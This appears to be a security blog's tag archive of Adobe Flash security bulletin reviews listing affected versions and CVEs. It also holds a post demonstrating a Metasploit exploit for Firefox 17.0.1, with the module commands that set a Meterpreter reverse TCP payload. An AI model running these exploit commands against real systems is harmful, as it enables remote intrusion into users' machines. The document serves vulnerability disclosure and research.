Tag Archives: Adobe

APSB15-32 – Adobe Flash December 2015 Security Bulletin Review

Vulnerability Management, , ,

Adobe has release, the December 8th 2015, during his December Patch Tuesday, one Adobe Flash security bulletin dealing with 77 vulnerabilities. This security bulletin has a Critical severity rating.

APSB15-32 is concerning:

  • Adobe Flash Player Desktop Runtime 19.0.0.245 and earlier on Windows and Macintosh
  • Adobe Flash Player Extended Support Release 18.0.0.261 and earlier on Windows and Macintosh
  • Adobe Flash Player for Google Chrome 19.0.0.245 and earlier on Windows, Macintosh, Linux and ChromeOS
  • Adobe Flash Player for Microsoft Edge and Internet Explorer 11 19.0.0.245 and earlier on Windows 10
  • Adobe Flash Player for Internet Explorer 10 and 11 19.0.0.245 and earlier on Windows 8.0 and 8.1
  • Adobe Flash Player for Linux 11.2.202.548 and earlier on Linux
  • AIR Desktop Runtime 19.0.0.241 and earlier on Windows and Macintosh
  • AIR SDK 19.0.0.241 and earlier on Windows, Macintosh, Android and iOS
  • AIR SDK & Compiler 19.0.0.241 and earlier on Windows, Macintosh, Android and iOS
  • AIR for Android

APSB13-16 – Adobe Flash June 2013 Security Bulletin Review

Vulnerability Management, , ,

Adobe has release, the June 11th 2013, during his June Patch Tuesday, one Adobe Flash security bulletin dealing with one vulnerability. This security bulletin has a Critical severity rating. The associated vulnerability has a 10.0 CVSS base score.

APSB13-16 – Adobe Flash June 2013 Security Bulletin Review

APSB13-16 is concerning :

  • Adobe Flash Player 11.7.700.202 and earlier versions for Windows
  • Adobe Flash Player 11.7.700.203 and earlier versions for Macintosh
  • Adobe Flash Player 11.2.202.285 and earlier versions for Linux
  • Adobe Flash Player 11.1.115.58 and earlier versions for Android 4.x
  • Adobe Flash Player 11.1.111.54 and earlier versions for Android 3.x and 2.x
  • Adobe AIR 3.7.0.1860 and earlier versions for Windows and Macintosh
  • Adobe AIR 3.7.0.1860 and earlier versions for Android
  • Adobe AIR 3.7.0.1860 SDK & Compiler and earlier versions

CVE-2013-3343 (10.0 CVSS base score), was discovered and privately reported by Mateusz Jurczyk and Ben Hawkes of the Google Security Team.

Firefox 17.0.1 + Flash Privileged Code Injection Metasploit Demo

Exploits, Metasploit, , , , , ,

Timeline :

Vulnerability discovered and reported to vendor by Marius Mlynski the 2012-11-21
Vulnerability corrected by vendor the 2013-01-08
Metasploit PoC provided the 2013-05-15

PoC provided by :

Marius Mlynski
joev
sinn3r

Reference(s) :

CVE-2013-0758
CVE-2013-0757
MFSA-2013-15

Affected version(s) :

Firefox 17.0.1 and previous

Tested on Windows 7 SP1 with :

Firefox 17.0.1

Description :

This exploit gains remote code execution on Firefox 17.0.1 and all previous versions, provided the user has installed Flash. No memory corruption is used. First, a Flash object is cloned into the anonymous content of the SVG “use” element in the(CVE-2013-0758). From there, the Flash object can navigate a child frame to a URL in the chrome:// scheme. Then a separate exploit (CVE-2013-0757) is used to bypass the security wrapper around the child frame’s window reference and inject code into the chrome:// context. Once we have injection into the chrome execution context, we can write the payload to disk, chmod it (if posix), and then execute. Note: Flash is used here to trigger the exploit but any Firefox plugin with script access should be able to trigger it.

Commands :

use exploit/multi/browser/firefox_svg_plugin
set SRVHOST 192.168.178.36
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.36
exploit

getuid
sysinfo

APSB13-14 – Adobe Flash May 2013 Security Bulletin Review

Vulnerability Management, , , , , , , , , , , , , , ,

Adobe has release, the May 14th 2013, during his May Patch Tuesday, one Adobe Flash security bulletin dealing with 13 vulnerabilities. This security bulletin has a Critical severity rating. The associated vulnerabilities have all a 10.0 CVSS base score.

APSB13-14 – Adobe Flash May 2013 Security Bulletin Review

APSB13-14 is concerning :

  • Adobe Flash Player 11.7.700.169 and earlier versions for Windows and Macintosh
  • Adobe Flash Player 11.2.202.280 and earlier versions for Linux
  • Adobe Flash Player 11.1.115.54 and earlier versions for Android 4.x
  • Adobe Flash Player 11.1.111.50 and earlier versions for Android 3.x and 2.x
  • Adobe AIR 3.7.0.1530 and earlier versions for Windows and Macintosh
  • Adobe AIR 3.7.0.1660 and earlier versions for Android
  • Adobe AIR 3.7.0.1530 SDK & Compiler and earlier versions

CVE-2013-2728 (10.0 CVSS base score), CVE-2013-3324 (10.0 CVSS base score), CVE-2013-3325 (10.0 CVSS base score), CVE-2013-3326 (10.0 CVSS base score), CVE-2013-3327 (10.0 CVSS base score), CVE-2013-3328 (10.0 CVSS base score), CVE-2013-3329 (10.0 CVSS base score), CVE-2013-3330 (10.0 CVSS base score), CVE-2013-3331 (10.0 CVSS base score) and CVE-2013-3332 (10.0 CVSS base score) were discovered and privately reported by Mateusz Jurczyk and Ben Hawkes of the Google Security Team.

CVE-2013-3333 (10.0 CVSS base score), CVE-2013-3334 (10.0 CVSS base score) and CVE-2013-3335 (10.0 CVSS base score) were discovered and privately reported by Mateusz Jurczyk, Gynvael Coldwind, and Fermin Serna of the Google Security Team.